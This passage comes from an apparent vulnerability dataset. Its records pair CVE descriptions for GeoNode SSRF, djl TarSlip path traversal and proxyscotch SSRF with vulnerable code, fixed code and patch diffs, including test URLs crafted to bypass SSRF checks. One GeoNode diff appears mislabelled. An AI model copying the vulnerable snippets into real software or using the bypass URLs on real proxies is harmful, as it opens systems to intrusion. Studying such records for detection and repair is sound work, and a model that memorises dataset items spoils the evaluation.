\"Fri, 05 Nov 2021 17: 19: 11 GMT\",\n \"Server\": \"nginx/1.17.2\",\n \"Set-Cookie\": \"sessionid = bogus-pocus; HttpOnly; Path=/; SameSite=Lax\",\n \"Strict-Transport-Security\": \"max-age=3600; includeSubDomains\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n }\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = _test_headers\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../image.tiff\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertDictContainsSubset(\n dict(response.headers.copy()),\n {\n \"Content-Type\": \"text/plain\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n \"Referrer-Policy\": \"same-origin\",\n \"X-Frame-Options\": \"SAMEORIGIN\",\n \"Content-Language\": \"en-us\",\n \"Content-Length\": \"119\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n },\n )\n\n def test_proxy_url_forgery(self):\n \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n import geonode.proxy.views\n from urllib.parse import urlsplit\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = {\n \"Content-Type\": \"text/plain\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n \"Referrer-Policy\": \"same-origin\",\n \"X-Frame-Options\": \"SAMEORIGIN\",\n \"Content-Language\": \"en-us\",\n \"Content-Length\": \"119\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n }\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n # Non-Legit requests attempting SSRF\n geonode.proxy.views.http_client.request = request_mock\n url = f\"http://example.org\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 403)\n\n url = f\"http://125.126.127.128\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 403)\n\n # Legit requests using the local host (SITEURL)\n url = f\"/\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 200)\n\n url = f\"{settings.SITEURL}\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 200)\n\n\nclass DownloadResourceTestCase(GeoNodeBaseTestSupport):\n def setUp(self):\n super().setUp()\n self.maxDiff = None\n create_models(type=\"dataset\")\n\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_not_existing_file(self):\n dataset = Dataset.objects.all().first()\n self.client.login(username=\"admin\", password=\"admin\")\n # ... all should be good\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # Espected 404 since there are no files available for this layer\n self.assertEqual(response.status_code, 404)\n content = response.content\n if isinstance(content, bytes):\n content = content.decode(\"UTF-8\")\n data = content\n self.assertTrue(\"No files have been found for this resource. Please, contact a system administrator.\" in data)\n\n @patch(\"geonode.storage.manager.storage_manager.exists\")\n @patch(\"geonode.storage.manager.storage_manager.open\")\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_existing_files(self, fopen, fexists):\n fexists.return_value = True\n fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n dataset = Dataset.objects.all().first()\n\n dataset.files = [\n \"/tmpe1exb9e9/foo_file.dbf\",\n \"/tmpe1exb9e9/foo_file.prj\",\n \"/tmpe1exb9e9/foo_file.shp\",\n \"/tmpe1exb9e9/foo_file.shx\",\n ]\n\n dataset.save()\n\n dataset.refresh_from_db()\n\n upload = Upload.objects.create(state=\"RUNNING\", resource=dataset)\n"}, {"id": "fix_py_160_2", "commit": "a9eebae", "file_path": "geonode/utils.py", "start_line": 1934, "end_line": 1953, "snippet": "def extract_ip_or_domain(url):\n ip_regex = re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)([a-zA-Z0-9.-]+)\")\n\n match = ip_regex.findall(url)\n if len(match):\n ip_address = match[0]\n try:\n ipaddress.ip_address(ip_address) # Validate the IP address\n return ip_address\n except ValueError:\n pass\n\n match = domain_regex.findall(url)\n if len(match):\n return match[0]\n\n return None\n\n"}], "vul_patch": "--- a/geonode/proxy/tests.py\n+++ b/geonode/proxy/tests.py\n@@ -1,10 +1,3 @@\n- self.maxDiff = None\n- self.admin = get_user_model().objects.get(username=\"admin\")\n-\n- # FIXME(Ariel): These tests do not work when the computer is offline.\n- self.proxy_url = \"/proxy/\"\n- self.url = TEST_URL\n-\n @override_settings(DEBUG=True, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass the proxy.\"\"\"\n@@ -116,6 +109,52 @@\n },\n )\n \n+ def test_proxy_url_forgery(self):\n+ \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n+ import geonode.proxy.views\n+ from urllib.parse import urlsplit\n+\n+ class Response:\n+ status_code = 200\n+ content = \"Hello World\"\n+ headers = {\n+ \"Content-Type\": \"text/plain\",\n+ \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n+ \"X-Content-Type-Options\": \"nosniff\",\n+ \"X-XSS-Protection\": \"1; mode=block\",\n+ \"Referrer-Policy\": \"same-origin\",\n+ \"X-Frame-Options\": \"SAMEORIGIN\",\n+ \"Content-Language\": \"en-us\",\n+ \"Content-Length\": \"119\",\n+ \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n+ }\n+\n+ request_mock = MagicMock()\n+ request_mock.return_value = (Response(), None)\n+\n+ # Non-Legit requests attempting SSRF\n+ geonode.proxy.views.http_client.request = request_mock\n+ url = f\"http://example.org\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 403)\n+\n+ url = f\"http://125.126.127.128\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 403)\n+\n+ # Legit requests using the local host (SITEURL)\n+ url = f\"/\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 200)\n+\n+ url = f\"{settings.SITEURL}\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 200)\n+\n \n class DownloadResourceTestCase(GeoNodeBaseTestSupport):\n def setUp(self):\n@@ -157,43 +196,3 @@\n dataset.refresh_from_db()\n \n upload = Upload.objects.create(state=\"RUNNING\", resource=dataset)\n-\n- assert upload\n-\n- self.client.login(username=\"admin\", password=\"admin\")\n- # ... all should be good\n- response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n- # Espected 404 since there are no files available for this layer\n- self.assertEqual(response.status_code, 200)\n- self.assertEqual(\"application/zip\", response.headers.get(\"Content-Type\"))\n- self.assertEqual('attachment; filename=\"CA.zip\"', response.headers.get(\"Content-Disposition\"))\n-\n- @patch(\"geonode.storage.manager.storage_manager.exists\")\n- @patch(\"geonode.storage.manager.storage_manager.open\")\n- @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n- def test_download_files(self, fopen, fexists):\n- fexists.return_value = True\n- fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n- dataset = Dataset.objects.all().first()\n-\n- dataset.files = [\n- \"/tmpe1exb9e9/foo_file.dbf\",\n- \"/tmpe1exb9e9/foo_file.prj\",\n- \"/tmpe1exb9e9/foo_file.shp\",\n- \"/tmpe1exb9e9/foo_file.shx\",\n- ]\n-\n- dataset.save()\n-\n- dataset.refresh_from_db()\n-\n- Upload.objects.create(state=\"COMPLETE\", resource=dataset)\n-\n- self.client.login(username=\"admin\", password=\"admin\")\n- response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n- # headers and status assertions\n- self.assertEqual(response.status_code, 200)\n- self.assertEqual(response.get(\"content-type\"), \"application/zip\")\n- self.assertEqual(response.get(\"content-disposition\"), f'attachment; filename=\"{dataset.name}.zip\"')\n- # Inspect content\n- zip_content = io.BytesIO(b\"\".join(response.streaming_content))\n\n--- /dev/null\n+++ b/geonode/proxy/tests.py\n@@ -0,0 +1,19 @@\n+def extract_ip_or_domain(url):\n+ ip_regex = re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\")\n+ domain_regex = re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)([a-zA-Z0-9.-]+)\")\n+\n+ match = ip_regex.findall(url)\n+ if len(match):\n+ ip_address = match[0]\n+ try:\n+ ipaddress.ip_address(ip_address) # Validate the IP address\n+ return ip_address\n+ except ValueError:\n+ pass\n+\n+ match = domain_regex.findall(url)\n+ if len(match):\n+ return match[0]\n+\n+ return None\n+\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-2914", "cve_description": "A TarSlip vulnerability exists in the deepjavalibrary/djl, affecting version 0.26.0 and fixed in version 0.27.0. This vulnerability allows an attacker to manipulate file paths within tar archives to overwrite arbitrary files on the target system. Exploitation of this vulnerability could lead to remote code execution, privilege escalation, data theft or manipulation, and denial of service. The vulnerability is due to improper validation of file paths during the extraction of tar files, as demonstrated in multiple occurrences within the library's codebase, including but not limited to the files_util.py and extract_imagenet.py scripts.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/deepjavalibrary/djl", "patch_url": ["https://github.com/deepjavalibrary/djl/commit/5235be508cec9e8cb6f496a4ed2fa40e4f62c370"], "programing_language": "Python", "vul_func": [{"id": "vul_py_328_1", "commit": "64c1b96", "file_path": "extensions/spark/setup/djl_spark/util/files_util.py", "start_line": 67, "end_line": 86, "snippet": "def download_and_extract(url, path):\n \"\"\"Download and extract a tar file.\n\n :param url: The url of the tar file.\n :param path: The path to the file to download to.\n \"\"\"\n if not os.path.exists(path):\n os.makedirs(path)\n if not os.listdir(path):\n with tmpdir() as tmp:\n tmp_file = os.path.join(tmp, \"tar_file\")\n if url.startswith(\"s3://\"):\n s3_download(url, tmp_file)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n t.extractall(path=path)\n elif url.startswith(\"http://\") or url.startswith(\"https://\"):\n with urlopen(url) as response, open(tmp_file, 'wb') as f:\n shutil.copyfileobj(response, f)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n t.extractall(path=path)"}], "fix_func": [{"id": "fix_py_328_1", "commit": "5235be508cec9e8cb6f496a4ed2fa40e4f62c370", "file_path": "extensions/spark/setup/djl_spark/util/files_util.py", "start_line": 67, "end_line": 100, "snippet": "def download_and_extract(url, path):\n \"\"\"Download and extract a tar file.\n\n :param url: The url of the tar file.\n :param path: The path to the file to download to.\n \"\"\"\n def is_within_directory(directory, target):\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n\n tar.extractall(path, members, numeric_owner=numeric_owner)\n\n if not os.path.exists(path):\n os.makedirs(path)\n if not os.listdir(path):\n with tmpdir() as tmp:\n tmp_file = os.path.join(tmp, \"tar_file\")\n if url.startswith(\"s3://\"):\n s3_download(url, tmp_file)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n safe_extract(t, path=path)\n elif url.startswith(\"http://\") or url.startswith(\"https://\"):\n with urlopen(url) as response, open(tmp_file, 'wb') as f:\n shutil.copyfileobj(response, f)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n safe_extract(t, path=path)"}], "vul_patch": "--- a/extensions/spark/setup/djl_spark/util/files_util.py\n+++ b/extensions/spark/setup/djl_spark/util/files_util.py\n@@ -4,6 +4,20 @@\n :param url: The url of the tar file.\n :param path: The path to the file to download to.\n \"\"\"\n+ def is_within_directory(directory, target):\n+ abs_directory = os.path.abspath(directory)\n+ abs_target = os.path.abspath(target)\n+ prefix = os.path.commonprefix([abs_directory, abs_target])\n+ return prefix == abs_directory\n+\n+ def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n+ for member in tar.getmembers():\n+ member_path = os.path.join(path, member.name)\n+ if not is_within_directory(path, member_path):\n+ raise Exception(\"Attempted Path Traversal in Tar File\")\n+\n+ tar.extractall(path, members, numeric_owner=numeric_owner)\n+\n if not os.path.exists(path):\n os.makedirs(path)\n if not os.listdir(path):\n@@ -12,9 +26,9 @@\n if url.startswith(\"s3://\"):\n s3_download(url, tmp_file)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n- t.extractall(path=path)\n+ safe_extract(t, path=path)\n elif url.startswith(\"http://\") or url.startswith(\"https://\"):\n with urlopen(url) as response, open(tmp_file, 'wb') as f:\n shutil.copyfileobj(response, f)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n- t.extractall(path=path)\n+ safe_extract(t, path=path)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-25850", "cve_description": "The package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. It occurs when an HTTP request is made by a backend server to an untrusted URL submitted by a user. It leads to a leakage of sensitive information from the server.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/hoppscotch/proxyscotch", "patch_url": ["https://github.com/hoppscotch/proxyscotch/commit/de67380f62f907f201d75854b76024ba4885fab7"], "programing_language": "Go", "vul_func": [{"id": "vul_go_240_1", "commit": "f319207", "file_path": "libproxy/proxy.go", "start_line": 22, "end_line": 27, "snippet": "var (\n\taccessToken string\n\tsessionFingerprint string\n\tallowedOrigins []string\n\tbannedOutputs []string\n)"}, {"id": "vul_go_240_2", "commit": "f319207", "file_path": "libproxy/proxy.go", "start_line": 66, "end_line": 117, "snippet": "func Initialize(\n\tinitialAccessToken string,\n\tproxyURL string,\n\tinitialAllowedOrigins string,\n\tinitialBannedOutputs string,\n\tonStatusChange statusChangeFunction,\n\twithSSL bool,\n\tfinished chan bool,\n) {\n\tif initialBannedOutputs != \"\" {\n\t\tbannedOutputs = strings.Split(initialBannedOutputs, \",\")\n\t}\n\tallowedOrigins = strings.Split(initialAllowedOrigins, \",\")\n\taccessToken = initialAccessToken\n\tsessionFingerprint = uuid.New().String()\n\tlog.Println(\"Starting proxy server...\")\n\n\thttp.HandleFunc(\"/\", proxyHandler)\n\n\tif !withSSL {\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServe(proxyURL, nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred: \"+httpServerError.Error(), false)\n\t\t\t}\n\n\t\t\tfinished <- true\n\t\t}()\n\n\t\tonStatusChange(\"Listening on http://\"+proxyURL+\"/\", true)\n\t} else {\n\t\tonStatusChange(\"Checking SSL certificate...\", false)\n\n\t\terr := EnsurePrivateKeyInstalled()\n\t\tif err != nil {\n\t\t\tlog.Println(err.Error())\n\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t}\n\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServeTLS(proxyURL, GetOrCreateDataPath()+\"/cert.pem\", GetOrCreateDataPath()+\"/key.pem\", nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t\t}\n\t\t}()\n\n\t\tonStatusChange(\"Listening on https://\"+proxyURL+\"/\", true)\n\t\tlog.Println(\"Proxy server listening on https://\" + proxyURL + \"/\")\n\t}\n}"}, {"id": "vul_go_240_3", "commit": "f319207", "file_path": "libproxy/proxy.go", "start_line": 131, "end_line": 326, "snippet": "func proxyHandler(response http.ResponseWriter, request *http.Request) {\n\t// We want to allow all types of requests to the proxy, though we only want to allow certain\n\t// origins.\n\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\tif request.Method == \"OPTIONS\" {\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\tresponse.WriteHeader(200)\n\t\treturn\n\t}\n\n\tif request.Header.Get(\"Origin\") == \"\" || !isAllowedOrigin(request.Header.Get(\"Origin\")) {\n\t\tif strings.HasPrefix(request.Header.Get(\"Content-Type\"), \"application/json\") {\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\t\tresponse.WriteHeader(200)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\t\treturn\n\t\t}\n\n\t\t// If it is not an allowed origin, redirect back to hoppscotch.io.\n\t\tresponse.Header().Add(\"Location\", \"https://hoppscotch.io/\")\n\t\tresponse.WriteHeader(301)\n\t\treturn\n\t} else {\n\t\t// Otherwise set the appropriate CORS polciy and continue.\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", request.Header.Get(\"Origin\"))\n\t}\n\n\t// For anything other than an POST request, we'll return an empty JSON object.\n\tresponse.Header().Add(\"Content-Type\", \"application/json; charset=utf-8\")\n\tif request.Method != \"POST\" {\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": true, \\\"data\\\":{\\\"sessionFingerprint\\\":\\\"\"+sessionFingerprint+\"\\\", \\\"isProtected\\\":\"+strconv.FormatBool(len(accessToken) > 0)+\"}}\")\n\t\treturn\n\t}\n\n\t// Attempt to parse request body.\n\tvar requestData Request\n\tisMultipart := strings.HasPrefix(request.Header.Get(\"content-type\"), \"multipart/form-data\")\n\tvar multipartRequestDataKey = request.Header.Get(\"multipart-part-key\")\n\tif multipartRequestDataKey == \"\" {\n\t\tmultipartRequestDataKey = \"proxyRequestData\"\n\t}\n\tif isMultipart {\n\t\tvar err = request.ParseMultipartForm(maxMemory)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t\tr := request.MultipartForm.Value[multipartRequestDataKey]\n\t\terr = json.Unmarshal([]byte(r[0]), &requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tvar err = json.NewDecoder(request.Body).Decode(&requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t}\n\n\tif len(accessToken) > 0 && requestData.AccessToken != accessToken {\n\t\tlog.Print(\"An unauthorized request was made.\")\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Unauthorized request; you may need to set your access token in Settings.\\\"}}\")\n\t\treturn\n\t}\n\n\t// Make the request\n\tvar proxyRequest http.Request\n\tproxyRequest.Header = make(http.Header)\n\tproxyRequest.Method = requestData.Method\n\tproxyRequest.URL, _ = url.Parse(requestData.Url)\n\n\tvar params = proxyRequest.URL.Query()\n\n\tfor k, v := range requestData.Params {\n\t\tparams.Set(k, v)\n\t}\n\tproxyRequest.URL.RawQuery = params.Encode()\n\n\tif len(requestData.Auth.Username) > 0 && len(requestData.Auth.Password) > 0 {\n\t\tproxyRequest.SetBasicAuth(requestData.Auth.Username, requestData.Auth.Password)\n\t}\n\tfor k, v := range requestData.Headers {\n\t\tproxyRequest.Header.Set(k, v)\n\t}\n\n\tproxyRequest.Header.Set(\"User-Agent\", \"Proxyscotch/1.1\")\n\n\tif isMultipart {\n\t\tbody := &bytes.Buffer{}\n\t\twriter := multipart.NewWriter(body)\n\t\tfor key := range request.MultipartForm.Value {\n\t\t\tif key == multipartRequestDataKey {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tfor _, val := range request.MultipartForm.Value[key] {\n\t\t\t\t// This usually never happens, mostly memory issue\n\t\t\t\terr := writer.WriteField(key, val)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field key: %s error: %v\", key, err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tfor fileKey := range request.MultipartForm.File {\n\t\t\tfor _, val := range request.MultipartForm.File[fileKey] {\n\t\t\t\tf, err := val.Open()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfield, _ := writer.CreatePart(val.Header)\n\t\t\t\t_, err = io.Copy(field, f)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t}\n\t\t\t\t// Close need not be handled, as go will clear temp file\n\t\t\t\tdefer func(f multipart.File) {\n\t\t\t\t\terr := f.Close()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Printf(\"Failed to close file\")\n\t\t\t\t\t}\n\t\t\t\t}(f)\n\t\t\t}\n\t\t}\n\t\terr := writer.Close()\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to write multipart content: %v\", err)\n\t\t\t_, _ = fmt.Fprintf(response, ErrorBodyProxyRequestFailed)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tcontentType := fmt.Sprintf(\"multipart/form-data; boundary=%v\", writer.Boundary())\n\t\tproxyRequest.Header.Set(\"content-type\", contentType)\n\t\tproxyRequest.Body = ioutil.NopCloser(bytes.NewReader(body.Bytes()))\n\t\tproxyRequest.Body.Close()\n\t} else if len(requestData.Data) > 0 {\n\t\tproxyRequest.Body = ioutil.NopCloser(strings.NewReader(requestData.Data))\n\t\tproxyRequest.Body.Close()\n\t}\n\n\tvar client http.Client\n\tvar proxyResponse *http.Response\n\tproxyResponse, err := client.Do(&proxyRequest)\n\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n\n\tvar responseData Response\n\tresponseData.Success = true\n\tresponseData.Status = proxyResponse.StatusCode\n\tresponseData.StatusText = strings.Join(strings.Split(proxyResponse.Status, \" \")[1:], \" \")\n\tresponseBytes, err := ioutil.ReadAll(proxyResponse.Body)\n\tresponseData.Headers = headerToArray(proxyResponse.Header)\n\n\tif requestData.WantsBinary {\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseBytes = bytes.ReplaceAll(responseBytes, []byte(bannedOutput), []byte(\"[redacted]\"))\n\t\t}\n\n\t\t// If using the new binary format, encode the response body.\n\t\tresponseData.Data = base64.RawStdEncoding.EncodeToString(responseBytes)\n\t\tresponseData.IsBinary = true\n\t} else {\n\t\t// Otherwise, simply return the old format.\n\t\tresponseData.Data = string(responseBytes)\n\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseData.Data = strings.Replace(responseData.Data, bannedOutput, \"[redacted]\", -1)\n\t\t}\n\t}\n\n\t// Write the request body to the response.\n\terr = json.NewEncoder(response).Encode(responseData)\n\n\t// Return the response.\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n}"}, {"id": "vul_go_240_4", "commit": "f319207", "file_path": "server/server.go", "start_line": 10, "end_line": 21, "snippet": "func main() {\n\thostPtr := flag.String(\"host\", \"localhost:9159\", \"the hostname that the server should listen on.\")\n\ttokenPtr := flag.String(\"token\", \"\", \"the Proxy Access Token used to restrict access to the server.\")\n\tallowedOriginsPtr := flag.String(\"allowed-origins\", \"*\", \"a comma separated list of allowed origins.\")\n\tbannedOutputsPtr := flag.String(\"banned-outputs\", \"\", \"a comma separated list of banned outputs.\")\n\tflag.Parse()\n\n\tfinished := make(chan bool)\n\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, onProxyStateChangeServer, false, finished)\n\n\t<-finished\n}"}], "fix_func": [{"id": "fix_go_240_1", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 22, "end_line": 28, "snippet": "var (\n\taccessToken string\n\tsessionFingerprint string\n\tallowedOrigins []string\n\tbannedOutputs []string\n\tbannedDests []string\n)"}, {"id": "fix_go_240_2", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 77, "end_line": 134, "snippet": "func Initialize(\n\tinitialAccessToken string,\n\tproxyURL string,\n\tinitialAllowedOrigins string,\n\tinitialBannedOutputs string,\n\tinitialBannedDests string,\n\tonStatusChange statusChangeFunction,\n\twithSSL bool,\n\tfinished chan bool,\n) {\n\tif initialBannedOutputs != \"\" {\n\t\tbannedOutputs = strings.Split(initialBannedOutputs, \",\")\n\t}\n\tif initialBannedDests != \"\" {\n\t\tbannedDests = strings.Split(initialBannedDests, \",\")\n\t} else {\n\t\tbannedDests = []string{}\n\t}\n\tallowedOrigins = strings.Split(initialAllowedOrigins, \",\")\n\taccessToken = initialAccessToken\n\tsessionFingerprint = uuid.New().String()\n\tlog.Println(\"Starting proxy server...\")\n\n\thttp.HandleFunc(\"/\", proxyHandler)\n\n\tif !withSSL {\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServe(proxyURL, nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred: \"+httpServerError.Error(), false)\n\t\t\t}\n\n\t\t\tfinished <- true\n\t\t}()\n\n\t\tonStatusChange(\"Listening on http://\"+proxyURL+\"/\", true)\n\t} else {\n\t\tonStatusChange(\"Checking SSL certificate...\", false)\n\n\t\terr := EnsurePrivateKeyInstalled()\n\t\tif err != nil {\n\t\t\tlog.Println(err.Error())\n\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t}\n\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServeTLS(proxyURL, GetOrCreateDataPath()+\"/cert.pem\", GetOrCreateDataPath()+\"/key.pem\", nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t\t}\n\t\t}()\n\n\t\tonStatusChange(\"Listening on https://\"+proxyURL+\"/\", true)\n\t\tlog.Println(\"Proxy server listening on https://\" + proxyURL + \"/\")\n\t}\n}"}, {"id": "fix_go_240_3", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 148, "end_line": 350, "snippet": "func proxyHandler(response http.ResponseWriter, request *http.Request) {\n\t// We want to allow all types of requests to the proxy, though we only want to allow certain\n\t// origins.\n\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\tif request.Method == \"OPTIONS\" {\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\tresponse.WriteHeader(200)\n\t\treturn\n\t}\n\n\tif request.Header.Get(\"Origin\") == \"\" || !isAllowedOrigin(request.Header.Get(\"Origin\")) {\n\t\tif strings.HasPrefix(request.Header.Get(\"Content-Type\"), \"application/json\") {\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\t\tresponse.WriteHeader(200)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\t\treturn\n\t\t}\n\n\t\t// If it is not an allowed origin, redirect back to hoppscotch.io.\n\t\tresponse.Header().Add(\"Location\", \"https://hoppscotch.io/\")\n\t\tresponse.WriteHeader(301)\n\t\treturn\n\t} else {\n\t\t// Otherwise set the appropriate CORS polciy and continue.\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", request.Header.Get(\"Origin\"))\n\t}\n\n\t// For anything other than an POST request, we'll return an 